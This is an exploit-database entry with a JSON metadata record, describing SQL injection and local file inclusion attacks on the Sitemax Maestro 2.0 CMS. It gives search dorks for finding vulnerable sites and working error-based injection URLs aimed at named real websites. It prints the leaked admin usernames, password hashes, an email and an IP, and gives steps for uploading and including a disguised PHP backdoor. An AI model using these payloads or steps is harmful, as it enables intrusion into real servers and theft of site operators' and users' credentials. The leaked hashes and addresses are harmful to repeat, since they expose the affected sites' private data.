Sitemax Maestro 2.0 SQL Injection / Local File Inclusion Vulnerability
2012-09-04T00:00:00
ID 1337DAY-ID-19323 Type zdt Reporter AkaStep Modified 2012-09-04T00:00:00
Description
Exploit for php platform in category web applications
========================================
Vulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)
Sitemax Maestro v. 2.0
Vendor: http://sitemax.am/
License Type: Commercial
Discovered and Exploited in Wild
=========================================
Dork 1:
site:am pages.php?al=
Dork 2:
site:am swlang.php
Dork: 3
Designed and developed by SiteMax IT
Sitemax Maestro v. 2.0
=========================================
Error based Blind SQLi:
http://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1
http://megasport.am/maestro/ <== Admin Panel
Megasport
2012-09-03 05:51
Fatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1
SELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1
If the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;))
http://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1
Demo 2 and New technique:
http://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1
2012-09-02 19:59
Fatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','[email protected]','130.193.121.51') from dual limit 1))),(rand() * 1e100))'
SELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1
Local File Inclusion:
After gain access to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php
Then include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==
Enjoy with your backdoor on server)
/AkaStep & BOT_25 & HERO_AZE
# 0day.today [2018-01-04] #
{"hash": "07928c4fffb79e69f7330859b2593a87d0a082ffe1c203391db6df7df110a683", "id": "1337DAY-ID-19323", "lastseen": "2018-01-05T01:06:00", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "5118193a15d492dc8d76613f11eadc23", "key": "href"}, {"hash": "afe706e1a2b2c10cf453e3bfd51d7bef", "key": "modified"}, {"hash": "afe706e1a2b2c10cf453e3bfd51d7bef", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5edcaa65f0089b4f09179ccbddaf3bd0", "key": "reporter"}, {"hash": "129958fea2008fda402d8ebb3578ff34", "key": "sourceData"}, {"hash": "dac04c056d787a4fc8bfd9795718b204", "key": "sourceHref"}, {"hash": "af857237082dd6502615573aa8e9270a", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 2.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/19323", "description": "Exploit for php platform in category web applications", "title": "Sitemax Maestro 2.0 SQL Injection / Local File Inclusion Vulnerability", "history": [{"bulletin": {"hash": "cd75b4a79d343684c5486a9bacf7303597ee987835e8305f23848970cd8bee7e", "id": "1337DAY-ID-19323", "lastseen": "2016-04-20T00:06:48", "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T00:06:48"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5edcaa65f0089b4f09179ccbddaf3bd0", "key": "reporter"}, {"hash": "afe706e1a2b2c10cf453e3bfd51d7bef", "key": "modified"}, {"hash": "a4b134716d119d963e5ed901a3f103c0", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "af857237082dd6502615573aa8e9270a", "key": "title"}, {"hash": "afe706e1a2b2c10cf453e3bfd51d7bef", "key": "published"}, {"hash": "df4ce6e20fe92bb38173b7bc49038a7d", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "cc706c74b5afc1c8dccd79fb48c90c1d", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/19323", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Sitemax Maestro 2.0 SQL Injection / Local File Inclusion Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "========================================\r\nVulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)\r\nSitemax Maestro v. 2.0\r\nVendor: http://sitemax.am/\r\nLicense Type: Commercial\r\nDiscovered and Exploited in Wild\r\n=========================================\r\nDork 1:\r\nsite:am pages.php?al=\r\n\r\nDork 2:\r\nsite:am swlang.php\r\n\r\nDork: 3\r\n\r\nDesigned and developed by SiteMax IT\r\nSitemax Maestro v. 2.0\r\n\r\n=========================================\r\n\r\n\r\nError based Blind SQLi:\r\n\r\n\r\nhttp://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n\r\nhttp://megasport.am/maestro/ <== Admin Panel\r\n\r\n\r\nMegasport\r\n2012-09-03 05:51\r\nFatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1\r\nSELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1\r\n\r\n\r\n\r\n\r\nIf the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;))\r\n\r\nhttp://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1\r\n\r\n\r\nDemo 2 and New technique:\r\n\r\n\r\nhttp://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1\r\n\r\n\r\n2012-09-02 19:59\r\nFatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','getosdur@localhost.tld','130.193.121.51') from dual limit 1))),(rand() * 1e100))'\r\nSELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1\r\n\r\n\r\n\r\nLocal File Inclusion:\r\n\r\nAfter gain access to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php\r\n\r\nThen include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==\r\n\r\n\r\n\r\nEnjoy with your backdoor on server)\r\n\r\n\r\n/AkaStep & BOT_25 & HERO_AZE\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2012-09-04T00:00:00", "references": [], "reporter": "AkaStep", "modified": "2012-09-04T00:00:00", "href": "http://0day.today/exploit/description/19323"}, "lastseen": "2016-04-20T00:06:48", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "========================================\r\nVulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)\r\nSitemax Maestro v. 2.0\r\nVendor: http://sitemax.am/\r\nLicense Type: Commercial\r\nDiscovered and Exploited in Wild\r\n=========================================\r\nDork 1:\r\nsite:am pages.php?al=\r\n\r\nDork 2:\r\nsite:am swlang.php\r\n\r\nDork: 3\r\n\r\nDesigned and developed by SiteMax IT\r\nSitemax Maestro v. 2.0\r\n\r\n=========================================\r\n\r\n\r\nError based Blind SQLi:\r\n\r\n\r\nhttp://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1\r\n\r\nhttp://megasport.am/maestro/ <== Admin Panel\r\n\r\n\r\nMegasport\r\n2012-09-03 05:51\r\nFatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1\r\nSELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1\r\n\r\n\r\n\r\n\r\nIf the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;))\r\n\r\nhttp://site.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1\r\n\r\n\r\nDemo 2 and New technique:\r\n\r\n\r\nhttp://armenbrok.am/pages.php?al=contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1\r\n\r\n\r\n2012-09-02 19:59\r\nFatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','[email\u00a0protected]','130.193.121.51') from dual limit 1))),(rand() * 1e100))'\r\nSELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND visible='1' LIMIT 1\r\n\r\n\r\n\r\nLocal File Inclusion:\r\n\r\nAfter gain access to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php\r\n\r\nThen include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==\r\n\r\n\r\n\r\nEnjoy with your backdoor on server)\r\n\r\n\r\n/AkaStep & BOT_25 & HERO_AZE\r\n\r\n\n\n# 0day.today [2018-01-04] #", "published": "2012-09-04T00:00:00", "references": [], "reporter": "AkaStep", "modified": "2012-09-04T00:00:00", "href": "https://0day.today/exploit/description/19323"}